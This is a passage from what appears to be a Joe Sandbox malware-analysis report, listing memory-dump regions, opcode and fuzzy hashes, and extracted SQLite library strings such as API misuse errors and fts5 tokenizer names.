                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6acc0fbdf75e51adfe4d4156d06201ae1f5f84aa527b28e49faa79ea044630f
                                                                • Instruction ID: 4dad376075babed9615201445b8195a9a04dc529ac4b61fe06de2a41b817056b
                                                                • Opcode Fuzzy Hash: a6acc0fbdf75e51adfe4d4156d06201ae1f5f84aa527b28e49faa79ea044630f
                                                                • Instruction Fuzzy Hash: 4A8145758083829BC7038F24988073BBBA0AF41220F65866EE8D917326DB35DC96C793
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                • Instruction ID: abc8659bc4ebfc3286ebb5c6d80c8414d2e45d83b7235f89232c6ae426e04726
                                                                • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                                                • Instruction Fuzzy Hash: 2551C476A083016FE700DE14EC80B7BB7E8EF84734F45052EFA4597252E725EA598793
                                                                Strings
                                                                • misuse, xrefs: 1D7B1B21
                                                                • %s at line %d of [%.10s], xrefs: 1D7B1B26
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7B1B17
                                                                • block, xrefs: 1D7B1A90
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-4016964285
                                                                • Opcode ID: 535958a01b68fd3f62f540152248f2365c2b34938b4f2fb4930d672b0140d35d
                                                                • Instruction ID: 14af0e2256976a60b8d026d4f4cdb46415453af3f7babb2858480bdefc30536f
                                                                • Opcode Fuzzy Hash: 535958a01b68fd3f62f540152248f2365c2b34938b4f2fb4930d672b0140d35d
                                                                • Instruction Fuzzy Hash: A2C1EEB1904251DFDB10CF28E884B6A7BB4BF45764F05876AEC499B212E731E914CFA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                • API String ID: 0-1539118790
                                                                • Opcode ID: ac4846af415b5dadcd016410b5f6e93a66ff86f4c80538afb4bc07b497ffcb0e
                                                                • Instruction ID: ef180400057145debc60182206644dd1997255367fa7c57550afcdb534a71926
                                                                • Opcode Fuzzy Hash: ac4846af415b5dadcd016410b5f6e93a66ff86f4c80538afb4bc07b497ffcb0e
                                                                • Instruction Fuzzy Hash: 9391E0716043209BD705CE18C884BAEB7F1BB85364F54462EFD899B391E736E846CB63
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                                                • API String ID: 0-165706444
                                                                • Opcode ID: a7c6450feab03eea0a3aec5cd98635059b271a514bc721f20e08f22ea2528fa8
                                                                • Instruction ID: 1e304e2e6ce104e345ddc2613e8e70802e09d7832dcd0d7edfa6b08d2ddee162
                                                                • Opcode Fuzzy Hash: a7c6450feab03eea0a3aec5cd98635059b271a514bc721f20e08f22ea2528fa8
                                                                • Instruction Fuzzy Hash: 5E617875A08381ABEF21AE24AC80F7777A89F81639F14486AFD5586653F321E144C7F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                                                • API String ID: 0-1499782803
                                                                • Opcode ID: 59d1bab4fd4422e3b83d861b8715c932c8bd8a89ad61ecda0f340e530ae4f751
                                                                • Instruction ID: 5fe5689a7454885fac4a7560a52b572fb82eda5b2ca53ee9dbccadbaf549cb7e
                                                                • Opcode Fuzzy Hash: 59d1bab4fd4422e3b83d861b8715c932c8bd8a89ad61ecda0f340e530ae4f751
                                                                • Instruction Fuzzy Hash: 5A51F275A083019BDB01CF18DD85B2677B4AF40275F15856EFC498F262E736E845CBA3
                                                                Strings
                                                                • misuse, xrefs: 1D769148
                                                                • API called with NULL prepared statement, xrefs: 1D76910D
                                                                • API called with finalized prepared statement, xrefs: 1D769122
                                                                • %s at line %d of [%.10s], xrefs: 1D76914D
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D76913E
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 389017462451b9a547abfa98212a82bcc80eb2adcbf029444203379875801b69
                                                                • Instruction ID: 39bdea09f5d91f6189c419cc76557d6edfa58ffdd4865698d4ef29d242f2ea3f
                                                                • Opcode Fuzzy Hash: 389017462451b9a547abfa98212a82bcc80eb2adcbf029444203379875801b69
                                                                • Instruction Fuzzy Hash: B84146B5A08741ABF7058E24DC88BEB37D5AB89234F25043EED598B342F725E50583B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                • API String ID: 0-538076154
                                                                • Opcode ID: c799cc3ff63c9af9c985eda359ca902520084e42f4a7489bf592ac161cea41dc
                                                                • Instruction ID: df913e8797062a2efedbbcb4c6da568fd52642108f6bb426059552514b18a78a
                                                                • Opcode Fuzzy Hash: c799cc3ff63c9af9c985eda359ca902520084e42f4a7489bf592ac161cea41dc
                                                                • Instruction Fuzzy Hash: FC415770A18340ABD7109E2CDC84FBB7BB9AF85B15F48456DF9895B342E779D00483A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                                                • API String ID: 0-538076154
                                                                • Opcode ID: 62c3c50cbeaddb718bd20911a37aea0a200bf0dff23392c9d0e6a62fef6c7080
                                                                • Instruction ID: 27389841f6dbeb9bd46ed31cdffddb9763606d3d5d4755cb918aaa645aa9caa8
                                                                • Opcode Fuzzy Hash: 62c3c50cbeaddb718bd20911a37aea0a200bf0dff23392c9d0e6a62fef6c7080
                                                                • Instruction Fuzzy Hash: 72314475508389FBD7115E64EC44AAB7BA9AF8533DF00053DFAA963202E761F60583B3
                                                                Strings
                                                                • misuse, xrefs: 1D766F6A
                                                                • API call with %s database connection pointer, xrefs: 1D766F54
                                                                • %s at line %d of [%.10s], xrefs: 1D766F6F
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766F60
                                                                • invalid, xrefs: 1D766F4F
                                                                • bad parameter or other API misuse, xrefs: 1D766F7E
                                                                • out of memory, xrefs: 1D766F39, 1D766FA0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$bad parameter or other API misuse$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$out of memory
                                                                • API String ID: 0-2911740470
                                                                • Opcode ID: 4ba2169d652c3a6ea4adcc23e9ba93e11a82a1c8ae044c424230ae59d4d4058a
                                                                • Instruction ID: 74706a77d2dfe3a555a66ad09f87c02ac748fc964285f55aec14eaa173874b80
                                                                • Opcode Fuzzy Hash: 4ba2169d652c3a6ea4adcc23e9ba93e11a82a1c8ae044c424230ae59d4d4058a
                                                                • Instruction Fuzzy Hash: 12214D7550475097FB154634EC40BEF23626BC0735FA985EEE8965B202F635E846C2B3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e0c40e496c3aff61437956149967fec98c6dbe6a698902377ff0717288e737b2
                                                                • Instruction ID: 90cd40d56d13ffc5537ae6071c8341d4df9f97080eac20eed5e8c99943b02a3d
                                                                • Opcode Fuzzy Hash: e0c40e496c3aff61437956149967fec98c6dbe6a698902377ff0717288e737b2
                                                                • Instruction Fuzzy Hash: 7C7145B59043229BDB06DF14D880A6A73E0BF84324F0505AEED899B302E336F945CBD3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0e0640b8dba20917e98818fe418486ab48af230ba8a74965999d23d4fe04e216
                                                                • Instruction ID: c7a31c01fb9d89848a07ba8fb785400a3b18706235f489d585c26a166b930234
                                                                • Opcode Fuzzy Hash: 0e0640b8dba20917e98818fe418486ab48af230ba8a74965999d23d4fe04e216
                                                                • Instruction Fuzzy Hash: 21418174408620EFC7105B65DCCDB2677B8BF016AEF010628F986A6621DB35F458CF63
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                • Instruction ID: b7fe9794bb8bca01ab775c77cc60b26cf67abfbc4c2de3222137f5f1376583da
                                                                • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                                                • Instruction Fuzzy Hash: DC21D8BB90C25237E302AA206C06FBFB39C5F51236F464556FF18A2052F724E60583A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: fts5$fts5_source_id$fts5vocab$porter$snippet$unable to delete/modify user-function due to active statements$unicode61
                                                                • API String ID: 0-2986783930
                                                                • Opcode ID: cf563f26a3f02fa8a0066287fc93d50ccf34b79811b78bc138f32816e838d9c9
                                                                • Instruction ID: 391ce8feffa69de7b29c0afcba45f8ac468a4798e565d5547ec34d6cc2089c97
                                                                • Opcode Fuzzy Hash: cf563f26a3f02fa8a0066287fc93d50ccf34b79811b78bc138f32816e838d9c9
                                                                • Instruction Fuzzy Hash: CFF19EB0504702AFD7019F24EC89B2B7BB4BF417A4F01463AED4A9B241E775E654CBA3
                                                                Strings
                                                                • misuse, xrefs: 1D84FBA0
                                                                • API called with NULL prepared statement, xrefs: 1D84FB65
                                                                • API called with finalized prepared statement, xrefs: 1D84FB7A
                                                                • %s at line %d of [%.10s], xrefs: 1D84FBA5
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D84FB96
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
